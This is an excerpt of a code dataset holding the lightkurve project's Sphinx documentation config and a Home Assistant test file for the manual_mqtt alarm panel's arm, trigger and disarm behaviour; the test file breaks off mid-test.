blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a4bbcef980b3d22943fdfba566982d8edf9f6e12
|
224a034669068398e59962d6470fb72dbe20e8c9
|
/docs/source/conf.py
|
c2ebdda082831d47b8d8224559261816deecc620
|
[
"MIT"
] |
permissive
|
lightkurve/lightkurve
|
b892b54ffbf3cb956f88300cb7d72b7e99fefdbf
|
7d485b69e9bbe58a1e7ba8d988387dc5d469ab36
|
refs/heads/main
| 2023-08-28T05:20:55.072927
| 2023-08-22T20:42:53
| 2023-08-22T20:42:53
| 118,387,904
| 148
| 66
|
MIT
| 2023-09-14T02:24:36
| 2018-01-22T00:49:59
|
Python
|
UTF-8
|
Python
| false
| false
| 5,016
|
py
|
conf.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__name__), '..'))
import lightkurve
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.mathjax',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'nbsphinx',
'numpydoc',
'sphinxcontrib.rawfiles']
autosummary_generate = True
# Disable RequireJS because it creates a conflict with bootstrap.js.
# This conflict breaks the navigation toggle button.
# The exact consequence of disabling RequireJS is not understood
# -- likely it means that notebook widgets may not work?
nbsphinx_requirejs_path = ""
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# Exclude build directory and Jupyter backup files:
exclude_patterns = ['_build', '**.ipynb_checkpoints']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ".".join(lightkurve.__version__.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = lightkurve.__version__
# General information about the project.
project = f'Lightkurve v{version}'
copyright = 'Lightkurve developers'
author = 'Lightkurve developers'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["**/.ipynb_checkpoints"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# Execute notebooks? Possible values: 'always', 'never', 'auto' (default)
nbsphinx_execute = "auto"
# Some notebook cells take longer than 60 seconds to execute
nbsphinx_timeout = 500
# PUT PROLOG HERE
nbsphinx_prolog = r"""
{% set docname = env.doc2path(env.docname, base=None) %}
.. only:: html
.. raw:: html
<div style="float:right; margin-bottom:1em;">
<a href="https://github.com/lightkurve/lightkurve/raw/main/docs/source/{{ docname }}"><img src="https://img.shields.io/badge/Notebook-Download-130654?logo=Jupyter&labelColor=fafafa"></a>
<a href="https://timeseries.science.stsci.edu/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Flightkurve%2Flightkurve&urlpath=lab%2Ftree%2Flightkurve%2Fdocs%2Fsource%2F{{ docname }}&branch=main"><img src="https://img.shields.io/badge/Notebook-Open%20in%20TIKE-130654?logo=Jupyter&labelColor=fafafa"></a>
</div>
<br style="clear:both;">
"""
# -- Options for HTML output ----------------------------------------------
html_theme = 'pydata_sphinx_theme'
html_theme_options = {
"external_links": [],
"github_url": "https://github.com/lightkurve/lightkurve",
"google_analytics_id": "UA-69171-9",
}
html_title = "Lightkurve "
html_static_path = ['_static']
html_css_files = [
'css/custom.css',
]
html_sidebars = {
"tutorials/*": [],
"tutorials/*/*": [],
"tutorials/*/*/*": [],
}
# Raw files we want to copy using the sphinxcontrib-rawfiles extension:
# - CNAME tells GitHub the domain name to use for hosting the docs
# - .nojekyll prevents GitHub from hiding the `_static` dir
rawfiles = ['CNAME', '.nojekyll']
# Make sure text marked up `like this` will be interpreted as Python objects
default_role = 'py:obj'
# intersphinx enables links to classes/functions in the packages defined here:
intersphinx_mapping = {'python': ('https://docs.python.org/3/', None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'astropy': ('https://docs.astropy.org/en/latest/', None)}
|
a7222f6246a13b31c012dfd7eeb2811225320b75
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/manual_mqtt/test_alarm_control_panel.py
|
0df1114bf30d89726c015b3c98dc690a146f00b6
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 48,514
|
py
|
test_alarm_control_panel.py
|
"""The tests for the manual_mqtt Alarm Control Panel component."""
from datetime import timedelta
from unittest.mock import patch
from freezegun import freeze_time
import pytest
from homeassistant.components import alarm_control_panel
from homeassistant.const import (
ATTR_CODE,
ATTR_ENTITY_ID,
SERVICE_ALARM_ARM_AWAY,
SERVICE_ALARM_ARM_CUSTOM_BYPASS,
SERVICE_ALARM_ARM_HOME,
SERVICE_ALARM_ARM_NIGHT,
SERVICE_ALARM_ARM_VACATION,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_ARMED_VACATION,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
assert_setup_component,
async_fire_mqtt_message,
async_fire_time_changed,
)
from tests.components.alarm_control_panel import common
from tests.typing import MqttMockHAClient
CODE = "HELLO_CODE"
async def test_fail_setup_without_state_topic(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test for failing with no state topic."""
with assert_setup_component(0, alarm_control_panel.DOMAIN) as config:
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "mqtt_alarm",
"command_topic": "alarm/command",
}
},
)
assert not config[alarm_control_panel.DOMAIN]
async def test_fail_setup_without_command_topic(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test failing with no command topic."""
with assert_setup_component(0, alarm_control_panel.DOMAIN):
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "mqtt_alarm",
"state_topic": "alarm/state",
}
},
)
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_no_pending(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_no_pending_when_code_not_req(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"code_arm_required": False,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_pending(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 1,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
state = hass.states.get(entity_id)
assert state.attributes["post_pending_state"] == expected_state
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == expected_state
# Do not go to the pending state when updating to the same state
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_invalid_code(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Attempt to arm without a valid code."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 1,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
with pytest.raises(HomeAssistantError, match=r"^Invalid alarm code provided$"):
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: f"{CODE}2"},
blocking=True,
)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_template_code(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Attempt to arm with a template-based code."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code_template": '{{ "abc" }}',
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: "abc"},
blocking=True,
)
state = hass.states.get(entity_id)
assert state.state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_specific_pending(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 10,
expected_state: {"pending_time": 2},
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test"},
blocking=True,
)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=2)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == expected_state
async def test_trigger_no_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test triggering when no pending submitted method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 1,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=60)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
async def test_trigger_with_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 1,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_zero_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disabled trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 0,
"trigger_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_zero_trigger_time_with_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disabled trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 2,
"trigger_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test arm home method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 2,
"trigger_time": 3,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
state = hass.states.get(entity_id)
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=2)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_disarm_after_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_zero_specific_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"disarmed": {"trigger_time": 0},
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_unused_zero_specific_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"armed_home": {"trigger_time": 0},
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_specific_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"disarmed": {"trigger_time": 5},
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_back_to_back_trigger_with_no_disarm_after_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test no disarm after back to back trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE, entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
async def test_disarm_while_pending_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarming while pending state."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
await common.async_alarm_disarm(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_disarm_during_trigger_with_invalid_code(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarming while code is invalid."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 5,
"code": "12345",
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
assert (
hass.states.get(entity_id).attributes[alarm_control_panel.ATTR_CODE_FORMAT]
== alarm_control_panel.CodeFormat.NUMBER
)
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
with pytest.raises(HomeAssistantError, match=r"Invalid alarm code provided$"):
await common.async_alarm_disarm(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
async def test_trigger_with_unused_specific_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 5,
"pending_time": 0,
"armed_home": {"delay_time": 10},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
